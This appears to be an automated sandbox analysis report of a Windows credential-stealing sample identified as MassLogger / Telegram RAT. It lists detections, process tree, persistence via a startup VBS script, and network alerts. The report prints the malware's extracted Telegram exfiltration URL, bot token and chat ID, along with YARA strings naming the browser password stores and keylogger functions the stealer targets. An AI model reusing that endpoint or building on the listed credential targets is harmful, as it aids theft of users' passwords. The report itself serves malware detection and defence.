Edit tour

Windows Analysis Report
eLo1khn7DQ.exe

Overview

General Information

Sample name:	eLo1khn7DQ.exe renamed because original name is a hash value
Original sample name:	007c44293c94aaad7af63741f5e50ea655d09f680116856393bd58487f3784e2.exe
Analysis ID:	1587854
MD5:	306abb19056fcd6a9524d361b1bff4f5
SHA1:	54360dc5e0da356496945e5e7a69f7481ae3a6bb
SHA256:	007c44293c94aaad7af63741f5e50ea655d09f680116856393bd58487f3784e2
Tags:	exeMassLoggeruser-adrian__luca
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

eLo1khn7DQ.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\eLo1khn7DQ.exe" MD5: 306ABB19056FCD6A9524D361B1BFF4F5)

lustring.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\eLo1khn7DQ.exe" MD5: 306ABB19056FCD6A9524D361B1BFF4F5)

RegSvcs.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\eLo1khn7DQ.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 5828 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

lustring.exe (PID: 5636 cmdline: "C:\Users\user\AppData\Local\done\lustring.exe" MD5: 306ABB19056FCD6A9524D361B1BFF4F5)

RegSvcs.exe (PID: 5048 cmdline: "C:\Users\user\AppData\Local\done\lustring.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA", "Telegram Chatid": "7804810800"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdf73:$a1: get_encryptedPassword 0xe29b:$a2: get_encryptedUsername 0xdd0e:$a3: get_timePasswordChanged 0xde2f:$a4: get_passwordField 0xdf89:$a5: set_encryptedPassword 0xf8e5:$a7: get_logins 0xf596:$a8: GetOutlookPasswords 0xf388:$a9: StartKeylogger 0xf835:$a10: KeyLoggerEventArgs 0xf3e5:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: lustring.exe PID: 7164	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: lustring.exe PID: 7164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lustring.exe PID: 7164	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: lustring.exe PID: 7164	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5057fc:$a1: get_encryptedPassword 0x505b15:$a2: get_encryptedUsername 0x5055ab:$a3: get_timePasswordChanged 0x5056cc:$a4: get_passwordField 0x505812:$a5: set_encryptedPassword 0x507115:$a7: get_logins 0x506dc6:$a8: GetOutlookPasswords 0x506bb8:$a9: StartKeylogger 0x507065:$a10: KeyLoggerEventArgs 0x506c15:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 6180	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6180	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6180	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6180	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x30e4c:$a1: get_encryptedPassword 0x31165:$a2: get_encryptedUsername 0x30bfb:$a3: get_timePasswordChanged 0x30d1c:$a4: get_passwordField 0x30e62:$a5: set_encryptedPassword 0x32765:$a7: get_logins 0x32416:$a8: GetOutlookPasswords 0x32208:$a9: StartKeylogger 0x326b5:$a10: KeyLoggerEventArgs 0x32265:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: lustring.exe PID: 5636	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: lustring.exe PID: 5636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lustring.exe PID: 5636	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: lustring.exe PID: 5636	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa7382a:$a1: get_encryptedPassword 0xa73b43:$a2: get_encryptedUsername 0xa735d9:$a3: get_timePasswordChanged 0xa736fa:$a4: get_passwordField 0xa73840:$a5: set_encryptedPassword 0xa75143:$a7: get_logins 0xa74df4:$a8: GetOutlookPasswords 0xa74be6:$a9: StartKeylogger 0xa75093:$a10: KeyLoggerEventArgs 0xa74c43:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 5048	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 5048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5048	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
7.2.lustring.exe.21b0000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.lustring.exe.21b0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.lustring.exe.21b0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.lustring.exe.21b0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
7.2.lustring.exe.21b0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
7.2.lustring.exe.21b0000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.lustring.exe.21b0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.lustring.exe.21b0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.lustring.exe.21b0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd373:$a1: get_encryptedPassword 0xd69b:$a2: get_encryptedUsername 0xd10e:$a3: get_timePasswordChanged 0xd22f:$a4: get_passwordField 0xd389:$a5: set_encryptedPassword 0xece5:$a7: get_logins 0xe996:$a8: GetOutlookPasswords 0xe788:$a9: StartKeylogger 0xec35:$a10: KeyLoggerEventArgs 0xe7e5:$a11: KeyLoggerEventArgsEventHandler
7.2.lustring.exe.21b0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12325:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11823:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b31:$a4: \Orbitum\User Data\Default\Login Data 0x12929:$a5: \Kometa\User Data\Default\Login Data
2.2.lustring.exe.1390000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.lustring.exe.1390000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.lustring.exe.1390000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.lustring.exe.1390000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
2.2.lustring.exe.1390000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
2.2.lustring.exe.1390000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.lustring.exe.1390000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.lustring.exe.1390000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.lustring.exe.1390000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd373:$a1: get_encryptedPassword 0xd69b:$a2: get_encryptedUsername 0xd10e:$a3: get_timePasswordChanged 0xd22f:$a4: get_passwordField 0xd389:$a5: set_encryptedPassword 0xece5:$a7: get_logins 0xe996:$a8: GetOutlookPasswords 0xe788:$a9: StartKeylogger 0xec35:$a10: KeyLoggerEventArgs 0xe7e5:$a11: KeyLoggerEventArgsEventHandler
2.2.lustring.exe.1390000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12325:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11823:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b31:$a4: \Orbitum\User Data\Default\Login Data 0x12929:$a5: \Kometa\User Data\Default\Login Data
Click to see the 20 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs" , ProcessId: 5828, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs" , ProcessId: 5828, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\done\lustring.exe, ProcessId: 7164, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:38:08.333262+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.12	49714	149.154.167.220	443	TCP
2025-01-10T18:38:21.385613+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.12	49722	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:38:00.731174+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49712	132.226.247.73	80	TCP
2025-01-10T18:38:07.246556+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49712	132.226.247.73	80	TCP
2025-01-10T18:38:14.340281+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49720	132.226.247.73	80	TCP
2025-01-10T18:38:20.355973+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49720	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:38:07.967704+0100	1810008	1	Potentially Bad Traffic	192.168.2.12	49714	149.154.167.220	443	TCP
2025-01-10T18:38:20.979750+0100	1810008	1	Potentially Bad Traffic	192.168.2.12	49722	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA", "Telegram Chatid": "7804810800"}
Source: RegSvcs.exe.5048.8.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\done\lustring.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\done\lustring.exe	Virustotal: Detection: 52%			Perma Link

Multi AV Scanner detection for submitted file

Source: eLo1khn7DQ.exe	Virustotal: Detection: 52%			Perma Link
Source: eLo1khn7DQ.exe	ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\done\lustring.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: eLo1khn7DQ.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: eLo1khn7DQ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49721 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49722 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: lustring.exe, 00000002.00000003.2405294114.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000002.00000003.2404333173.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2540755425.0000000003F50000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2542152989.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: lustring.exe, 00000002.00000003.2405294114.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000002.00000003.2404333173.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2540755425.0000000003F50000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2542152989.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0025DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0025DBBE
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0022C2A2 FindFirstFileExW,	0_2_0022C2A2
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_002668EE FindFirstFileW,FindClose,	0_2_002668EE
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0026698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0026698F
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0025D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0025D076
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0025D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0025D3A9
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00269642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00269642
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0026979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0026979D
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00269B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00269B2B
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00265C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00265C97
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0014DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0014DBBE
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0011C2A2 FindFirstFileExW,	2_2_0011C2A2
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_001568EE FindFirstFileW,FindClose,	2_2_001568EE
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0015698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_0015698F
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0014D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0014D076
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0014D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0014D3A9
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00159642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00159642
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0015979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0015979D
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00159B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00159B2B
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00155C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00155C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FC34Dh	8_2_056FC010
